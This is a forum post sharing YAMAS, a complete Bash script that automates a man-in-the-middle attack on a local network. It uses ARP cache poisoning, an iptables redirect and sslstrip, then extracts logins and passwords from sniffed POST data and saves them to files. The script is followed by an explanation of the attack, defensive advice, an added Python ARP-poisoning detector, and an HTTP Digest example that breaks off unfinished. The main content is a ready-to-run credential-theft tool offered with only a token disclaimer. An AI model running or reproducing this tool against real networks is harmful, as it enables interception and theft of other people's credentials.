[Bash] YAMAS - LAN Sniffer

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Bash] YAMAS - LAN Sniffer

    LAN Network sniffer, YAMAS is a fully automated MITM attack tool.

    Note: you need arpspoof, sslstrip and some other dependencies installed to make it work (everything is already available on BT).

    #!/bin/bash
    # Bash script to launch a man in the middle attack and sslstrip.
    # version 0.9 by comaX
    version="0.9.4"
    # if user ^C then execute cleanup function
    trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

    fast_cleanup() {
    echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
    if [[ ${looparseid} != "" ]]; then kill ${looparseid}
    fi
    if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
    fi
    if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
    fi
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    killall ettercap
    else
    killall arpspoof
    fi
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # there are probably too many resets here,
    iptables --table nat --flush # but at least we're sure everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain
    if [ -e '/tmp/looparse.sh' ]; then
    rm /tmp/looparse.sh
    fi
    if [ -e '/tmp/grepcred.txt' ]; then
    rm /tmp/grepcred.txt
    fi
    echo -e "\033[32m[-] Clean up successful !\033[m"
    exit 0
    }

    #Let's define some arguments that can be passed to the script :
    if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
    if [[ $2 == "" ]]; then
    echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
    exit 0
    fi
    clear
    wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
    echo -e "Parsing $2 for credentials.\n\n"
    cat $2 |
    awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
    awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
    egrep -i -a -f /tmp/grepcred.txt |
    awk -F "=" '{if (length($2) < 4) print "";
    else if ($1 ~/Website/) print $0;
    else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
    else print "Login = \t"$2}' |
    uniq
    rm /tmp/grepcred.txt
    exit 0
    fi

    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    echo -e "\tYou will be using Ettercap instead of ARPspoof."
    sleep 0.5
    fi

    if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
    clear
    echo -e "You are running $0, version $version.


    usage : $0 [-h -c -p]* [-e -s]**
    -h or --help : Display this help message, disclaimer and exit.

    -c or --change: Display changelog and todo.
    -e : Use ettercap instead of ARPspoof. One might have one's reasons...
    ARPspoof is default.
    -p or --parse : Only parse the given <file>. Don't use wildcards.
    Use > /output_file to print to a file.
    -s : The script won't download anything. Make sure you have the needed files.
    *Must be used alone
    **Can be used at the same time.

    \033[31m DISCLAIMER :\033[m
    This program is intended for learning purpose only. I do not condone hacking
    and wouldn't be held responsible for your actions. Only you would face legal
    consequences if you used this script for illegal activities.

    \033[31m What I think should be learnt from this script :\033[m
    This script should teach you how easy it is to steal sensitive online
    credentials and how to protect you from it, provided you understand
    what this program does. The best way to understand what it does is
    to look at its source. This will also teach you basic shell scripting."
    exit 0
    fi
    if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
    clear
    echo -e "\033[31m Changelog :\033[m
    Should be added in next version/revision :
    - Submit your ideas !
    - We're close to a final version !

    Added in v0.9.x
    - Ettercap support (with -e switch in parameters)
    - Silent mode (-s)
    - Code enhancing.

    Added in v0.8.x
    - Tail-greping log file so we can be sure there is traffic being sniffed
    - New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
    This should be tested though to ensure maximum reliability. Please report back !
    0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
    - New -p option to allow only parsing a file. (v0.8.5)
    - More improvements.
    - Catching ^C and cleanup before quitting. (v0.8.5)
    - Realtime parsing menu. (V0.8.5)

    \033[31mFeatures :\033[m
    - Output of credentials as they are sniffed in xterm window.
    - Log parsing for user-friendly output.
    - Both arpspoof and ettercap are suported
    - Network mapping for host discovery.
    - Can save \"dumped\" passwords to file.
    - Support for multiple targets on the network.
    - Can parse a single file.
    - Install sslstrip if needed.
    - Display ASCII tables for better readability of creds.
    - All options know default, pressing only enter should get you through.
    - Very neat and kewl ascii =D

    \033[31m Credits :\033[m
    Credits go to all people on backtrack forums for their help and support,
    and google for being my best friend with scripting.
    Special kudos to ShortBuss for something I should have seen a
    long time ago (sslstrip before arpspoof) and many little improvements.
    And of course, to the people responsible for the tools I am using in this script.

    Please criticize this program or submit ideas on the official thread at
    http://tinyurl.com/yamas-bt5 or send me a mail at [email protected]"
    exit
    fi

    ### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    message="\nNo message to display : you are running in silent mode"
    else
    wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
    message=$(cat /tmp/message) #store it to variable
    rm /tmp/message #remove temp message file
    fi

    ### Check for updates !
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "Not checking for a new version : silent mode."
    else
    wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
    last_version=$(cat /tmp/version) #store it to variable
    rm /tmp/version #remove temp version file

    if [[ $last_version > $version ]] ; then # Comparing to current version
    echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
    read update
    if [[ $update = Y || $update = y ]] ; then
    echo "[+] Updating script..."
    wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
    chmod +x $0
    echo "[-] Script updated !"
    if [[ $0 != '/usr/bin/yamas' ]] ; then
    echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
    read install
    if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
    cp $0 /usr/bin/yamas
    chmod +x /usr/bin/yamas
    echo "Script should now be installed, launching yamas !"
    sleep 3
    yamas
    exit 1
    else echo "Ok, continuing with updated version..."
    sleep 3
    $0
    exit 1
    fi
    fi
    sleep 2
    $0
    exit 1
    else echo "Ok, continuing with current version..."
    fi
    else echo "No update available"
    fi
    fi
    ### End of update process

    ### Install process
    if [[ ! -e '/usr/bin/yamas' ]] ; then
    echo "Script is not installed. Do you want to install it ? (Y/N)"
    read install
    if [[ $install = Y || $install = y ]] ; then
    cp -v $0 /usr/bin/yamas
    chmod +x /usr/bin/yamas
    rm $0
    echo "Script should now be installed. Launching it !"
    sleep 3
    yamas
    exit 1
    else echo "Ok, not installing then !"
    fi
    else echo "Script is installed"
    sleep 1
    fi
    ### End of install process
    clear
    echo -e "
    _______ _______ _______ _______ _______ _____
    |\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
    ( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
    \ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
    \ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
    ) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
    | | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
    \_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
    echo -e "===========================================================================
    =\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
    =\033[31m Use this tool responsibly, and enjoy!\033[m =
    = Feel free to contribute and distribute this script as you please. =
    = Official thread : http://tinyurl.com/yamas-bt5 =
    = Check out the help (-h) to see new features and informations =
    = You are running version \033[32m$version\033[m =
    ==========================================================================="
    echo -e "\033[36mMessage of the day :\033[m"
    echo -e "$message"
    echo
    # Starting fresh : reset IP forward and iptables
    echo -e "\033[31m [+] Cleaning iptables \033[m"
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "[-] Cleaned."

    # Defining exit function and other ending features

    cleanup() {
    echo
    echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

    kill ${sslstripid}
    kill ${looparseid}
    if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
    fi
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    killall ettercap
    else
    killall arpspoof
    fi
    echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
    iptables --flush # there are probably too many resets here,
    iptables --table nat --flush # but at least we're sure everything's clean
    iptables --delete-chain
    iptables --table nat --delete-chain
    rm /tmp/looparse.sh
    rm /tmp/grepcred.txt

    echo -e "\033[32m[-] Clean up successful !\033[m"
    echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
    echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
    read -e keep
    if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
    cp /tmp/$filename.txt /root/$filename.txt #moving file
    if [ -f "/root/$filename.txt" ]; then #check if it exists
    echo "Log file copied !" #it does
    else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
    fi
    else echo "Logs not saved"
    fi
    echo
    echo "Do you want to save passwords to a file? (Y=keep)"
    echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
    read -e keeppd
    if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
    else
    wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
    fi
    cat /tmp/$filename.txt |
    awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
    awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
    egrep -i -a -f /tmp/grepcred.txt |
    awk -F "=" '{if (length($2) < 4) print "";
    else if ($1 ~/Website/) print $0;
    else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
    else print "Login = \t"$2}' |
    uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
    if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
    echo "Passwords saved !" #it does
    else echo "Error while saving passwords" #it does not
    fi
    else echo "Password saving skipped."
    fi
    rm /tmp/$filename.txt
    echo -e "\nTemporary files deleted."

    if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
    echo
    echo
    exit 1 #if yes, exit.
    else
    echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
    read -e install
    if [[ $install = "Y" || $install = "y" ]] ; then # spaces around = are required, otherwise the test is always true
    cp ./yamas.sh /usr/bin/yamas #copy and rename script
    echo -e "\033[32m Script installed !\033[m"
    else echo "Script not installed."
    fi
    fi
    exit 1
    }

    updatestrip() {
    wget -q http://www.thoughtcrime.org/software...rip-0.9.tar.gz
    tar zxvf sslstrip-0.9.tar.gz
    cd sslstrip-0.9
    python ./setup.py install > /dev/null
    cd ..
    rm sslstrip-0.9.tar.gz
    }

    search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
    #We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
    #so there is no need to do it twice.
    rescan () {
    echo -e "\033[31m"
    nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
    echo -en "\033[m"
    final
    }

    add_target() {
    echo "Enter a new IP adress to attack :"
    read newip
    xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
    final
    }

    ascii() {
    clear
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "ASCII tables won't be available"
    echo "ASCII tables are not available" > /tmp/ascii
    else
    wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
    cat /tmp/ascii
    rm /tmp/ascii
    fi
    final
    }

    tailsecure() {
    xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
    final
    }

    rtparse() {
    echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
    1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
    2. Resume RTP.
    3. Kill RTP (stop and close xterm)
    4. Re-launch RTP
    5. Previous menu."
    read rtp
    if [ "$rtp" = "1" ] ; then
    echo -e "\033[33m[+]Pausing...\033[m"
    kill -19 ${looparseid}
    echo -e "\033[33m[-]Paused.\033[m"
    rtparse
    elif [ "$rtp" = "2" ] ; then
    echo -e "\033[33m[+]Resuming...\033[m"
    kill -18 ${looparseid}
    echo -e "\033[33m[-]Resumed.\033[m"
    rtparse
    elif [ "$rtp" = "3" ] ; then
    echo -e "\033[31m[+]Killing...\033[m"
    kill ${looparseid}
    echo -e "\033[33m[-]Killed.\033[m"
    rtparse
    elif [ "$rtp" = "4" ] ; then
    echo -e "\033[32m[+]Launching...\033[m"
    xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
    sleep 2
    echo -e "\033[33m[-]Launched.\033[m"
    rtparse
    elif [ "$rtp" = "5" ] ; then
    echo "Previous"
    final
    else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    rtparse
    fi
    }

    final() {
    echo -e "\n\033[32mAttack is running\033[m. You can :
    1. Rescan network.
    2. Add a target (useless if targeting whole network).
    3. Display ASCII correspondence table.
    4. Tail-grep hosts through output (make sure there is traffic).
    5. Real-time parsing...
    6. Quit properly.

    Enter the number of the desired option."
    read final
    if [ "$final" = "1" ] ; then
    rescan
    elif [ "$final" = "2" ] ; then
    add_target
    elif [ "$final" = "3" ] ; then
    ascii
    elif [ "$final" = "4" ] ; then
    tailsecure
    elif [ "$final" = "5" ] ; then
    rtparse
    elif [ "$final" = "6" ] ; then
    cleanup
    else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    final
    fi
    }

    ###############################End of functions#############################

    # IP forwarding
    echo
    echo -e "\033[31m [+] Activating IP forwarding... \033[m"
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "[-] Activated."

    #Iptables
    echo
    echo -e "\033[31m [+] Configuring iptables... \033[m"
    echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
    echo
    read -e outport
    if [ "$outport" = "" ] ; then
    outport=8080
    echo -e "Port $outport selected as default.\n"
    fi
    echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
    echo
    read -e inport
    if [ "$inport" = "" ] ; then
    inport=80
    echo -e "Port $inport selected as default.\n"
    fi
    echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
    iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
    echo "[-] Traffic rerouted"

    #Sslstrip
    echo
    echo -e "\033[31m [+] Activating sslstrip... \033[m"
    echo "Choose filename to output : (default = yamas)"
    read -e filename
    if [ "$filename" = "" ] ; then
    filename="yamas"
    fi
    echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
    #### BEGIN of update process ####
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then
    echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
    sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    else
    if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
    version ? [Y/N]
    Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
    should be safe to use though."
    read -e sslupdate
    if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
    updatestrip
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
    if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
    else echo -e "\033[33mOops, install failed.\033[m Continuing with current version."
    fi
    else echo "All right, continuing with current version."
    fi
    elif [[ $sslversion = "0.9" ]]; then
    echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
    fi

    elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
    sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
    read -e sslupdate
    if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
    updatestrip
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
    if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
    sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    else echo -e "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
    /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    fi
    else echo "All right, continuing with current, non-installed version."
    /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    fi
    fi
    elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
    echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
    chmod +x '/pentest/web/sslstrip/sslstrip.py'
    if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
    echo "Now it is. Continuing..."
    /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
    else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
    installed.
    You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
    apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
    read apti
    if [[ $apti = "Y" || $apti = "y" ]] ; then
    apt-get install sslstrip
    exit 1
    fi
    fi
    fi
    fi

    sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
    echo
    echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
    echo

    #Arpspoofing
    echo
    echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
    echo
    ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
    iface=$(ip route show | awk '(NR == 2) { print $5}')
    gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
    echo
    echo "Enter IP gateway adress or press enter to use $gateway."
    read -e gateway
    if [ "$gateway" = "" ] ; then
    gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
    echo -e "$gateway selected as default.\n"
    fi
    echo
    echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
    read -e iface
    if [ "$iface" = "" ] ; then
    iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
    echo -e "$iface selected as default.\n"
    fi
    echo -e "\r"
    echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
    Press enter to default."
    read -e choicearp
    echo

    if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
    echo
    echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
    read -e hosts
    echo -e "\033[31m "
    if [[ $hosts = "Y" || $hosts = "y" ]] ; then
    nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
    echo -e "\033[m " # switch color back to white
    else echo -e "\033[m "
    fi
    echo -e "Please enter targets according to usage : IP1 IP2 IP3...
    \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
    arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
    while [ "$1" != "" ]; do
    xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
    shift
    done
    echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
    }
    ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
    while [ "$1" != "" ]; do
    xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
    shift
    done
    echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
    }
    read -e parameters
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    ettercapi $parameters
    else
    arpspoofi $parameters
    fi

    else
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
    sleep 2
    echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
    else
    xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
    sleep 2
    echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
    fi
    fi

    echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"

    echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
    echo
    echo
    echo "looparse(){" > /tmp/looparse.sh
    if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
    else
    echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
    fi
    echo "while :
    do
    clear
    echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
    cat /tmp/$filename.txt |
    awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
    awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
    egrep -i -f '/tmp/grepcred.txt' |
    awk -F \"=\" '{if (length(\$2) < 3) print \"\";
    else if (\$1 ~/[W]/) print \$0;
    else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
    else print \"Login = \t\t\", \$2}' |
    uniq
    sleep 7
    done
    }
    looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
    chmod +x /tmp/looparse.sh
    xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
    sleep 2
    final #call the "final" function. Yes, it's the final one.
    ### End of the script fellas.
    ---

    Well, this script is a MITM attack. But how do you protect yourself from this kind of crap?!

    How to protect yourself from Man in the Middle Attacks? --
    Introduction -- How it works.

    In the attack Yamas uses, the vector is the poisoning of the victim's ARP cache. ARP is the protocol that "translates" physical MAC addresses into IP addresses on the local network. When a piece of equipment wants to connect to the network, it asks for the MAC of the router's IP, e.g.: "Who has 192.168.1.1? Tell 192.168.1.2". The router then responds "192.168.1.1 [router] is at 11:22:33:44:55:66 [router]". This is written into the ARP cache of the client. And this is where we come into play. We send spoofed ARP responses: "192.168.1.1 [router] is at 00:11:22:66:66:66 [attacker]". The client then modifies its cache to set the attacker as the router. We then forward the traffic to the real router, which allows us to read and manipulate the traffic on the fly. That's how we get the passwords. Thanks to sslstrip, we force the clients to send the credentials as clear text, so that we can simply read them.
    All right, but now, how do you prevent that from happening to you?
    Protection - Client side

    When you are a client - a website visitor - there are two things you can do: use programs, and/or your head. Program-wise, you'll have to find one that regularly checks for changes in the ARP tables to warn you in case of suspicious changes. Well-known ones include ARPon or ARPwatch.
    You could also use ettercap under *nux or wireshark on any platform: even though it is not their job, and they will not run all the time, they will warn you in case of duplicate ARP responses with different MAC addresses. That can also be achieved with some internet security suites, but I won't make free ads for them, so you'll have to find them with your friend Google.
    In the end, it's most of all a question of habits, or using your head, knowing your environment: thou shalt never - ever - enter any [important] credential on unsecured connections such as public hotspots and open wifi, under any circumstances. Thou shalt always check if the connection to the website is safe: the certificate looks good, is up to date and the connection is tunneled through SSL (v3 if possible).
    Since you're here, you probably use this attack yourself, so you should be able to recognize the glitches it provokes: have to reload the page? Page looks weird? Takes time to load? Disconnected when you didn't ask for it? Pay attention, you may be under attack!
    If you have any doubt, just don't send anything sensitive over the network. It may seem obvious, but that's how you'll really protect yourself.
    Protection - Server side

    I either don't know much about it, or there's not much that I know to do. Well, here's what you can do: use an encrypted connection through SSL (but that sometimes costs, and I wouldn't pay for that...) or request the passwords to be encrypted before they are sent! This can be done with .htaccess by using AuthType Digest. By requesting an MD5 encrypted password before it transits on the network, it could be sniffed, but rendered useless since MD5 isn't that easy to crack if you're using a good password. I know I wouldn't waste time cracking an MD5 password...
    I'll try to add a module here to show you that. Meanwhile you can head over to maemo's website that uses this technique and sniff the network while doing so.


    Edit : This is not the latest available version, go and grab it at http://comax.fr/
    Last edited by comaX, 09 September 2011, 20:40.
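The client-side advice above is to watch the ARP table for suspicious changes, the way ARPwatch does. The following is an added example, not code from the post or from the YAMAS script: it applies that check to ARP reply lines in the shape printed by `tcpdump -n arp`, and flags both symptoms of the poisoning the post describes (the gateway IP suddenly "is at" another MAC, and one MAC claiming several IPs). All addresses and lines are constructed.

```python
"""arpwatch-style detection of ARP cache poisoning over sample tcpdump lines.

Added example, not part of the post or the YAMAS script. The sample lines are
constructed in the shape of `tcpdump -n arp` output, with made-up addresses.
"""
import re
from collections import defaultdict

# One ARP reply line as tcpdump -n prints it: "<ts> ARP, Reply <ip> is-at <mac>, length <n>"
ARP_REPLY = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, Reply (?P<ip>\d+(?:\.\d+){3}) "
    r"is-at (?P<mac>[0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5}), length \d+$"
)


def parse_reply(line):
    """Return (seconds since midnight, ip, mac) for an ARP reply line, else None."""
    m = ARP_REPLY.match(line.strip())
    if m is None:
        return None  # requests and non-ARP lines carry no binding claim
    h, mi, s = m.group("ts").split(":")
    return int(h) * 3600 + int(mi) * 60 + float(s), m.group("ip"), m.group("mac").lower()


class ArpWatch:
    """Learn IP -> MAC bindings from replies and alert on the two symptoms of the
    attack: a known IP re-announced from a different MAC (rated high when it is
    the gateway, which is exactly the spoofed reply the post quotes), and one
    MAC claiming several IPs, which is what two-way arpspoof poisoning looks
    like on the wire (the attacker impersonates the router and the victim)."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.bindings = {}                   # ip -> mac last seen claiming it
        self.ips_per_mac = defaultdict(set)  # mac -> ips it has claimed so far
        self.multi_reported = set()          # macs already reported for multi-IP
        self.alerts = []

    def observe(self, ts, ip, mac):
        old = self.bindings.get(ip)
        if old is None:
            self.bindings[ip] = mac          # first time we hear about this IP
        elif old != mac:
            self.alerts.append({
                "ts": ts, "kind": "binding_changed", "ip": ip,
                "old_mac": old, "new_mac": mac,
                "severity": "high" if ip == self.gateway_ip else "medium",
            })
            self.bindings[ip] = mac          # track the cache as the victim sees it
        self.ips_per_mac[mac].add(ip)
        if len(self.ips_per_mac[mac]) > 1 and mac not in self.multi_reported:
            self.multi_reported.add(mac)
            self.alerts.append({
                "ts": ts, "kind": "mac_claims_multiple_ips", "mac": mac,
                "ips": sorted(self.ips_per_mac[mac]), "severity": "high",
            })


def analyze(lines, gateway_ip):
    """Run every parsable ARP reply through ArpWatch and return the alerts."""
    watch = ArpWatch(gateway_ip)
    for line in lines:
        parsed = parse_reply(line)
        if parsed is not None:
            watch.observe(*parsed)
    return watch.alerts


# Constructed capture: a legitimate router and client, then a poisoner that
# claims the router's IP and the client's IP from the same MAC.
SAMPLE_LINES = [
    "12:00:00.000001 ARP, Reply 192.168.1.1 is-at 11:22:33:44:55:66, length 28",    # real router
    "12:00:00.500000 ARP, Reply 192.168.1.2 is-at aa:bb:cc:dd:ee:02, length 28",    # real client
    "12:00:01.000000 ARP, Request who-has 192.168.1.2 tell 192.168.1.1, length 28", # ignored
    "12:00:05.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:66:66:66, length 28",    # router "is at" new MAC
    "12:00:05.000100 ARP, Reply 192.168.1.2 is-at 00:11:22:66:66:66, length 28",    # same MAC claims client
    "12:00:07.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:66:66:66, length 28",    # repeat, no new alert
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LINES, "192.168.1.1"):
        print(alert)
```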
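The server-side section points at .htaccess with AuthType Digest. As an added example (not the post's promised module and not the post's own code), this is what HTTP Digest authentication (RFC 2617, MD5, qop=auth) actually puts on the wire: the client proves knowledge of the password with a response bound to a server nonce, the password string itself never leaves the browser, and the server keeps only HA1 the way htdigest does. Username, realm, password, nonce and URI values are constructed.

```python
"""HTTP Digest authentication, client and server sides, for one challenge.

Added example, not part of the post. Shows why a sniffer sees a nonce-bound
MD5 response instead of the password, and why replaying that response against
a fresh nonce fails. All values below are constructed.
"""
import hashlib
import hmac
import re


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    """What htdigest stores for a user: MD5(user:realm:password), never the password."""
    return md5_hex(f"{username}:{realm}:{password}")


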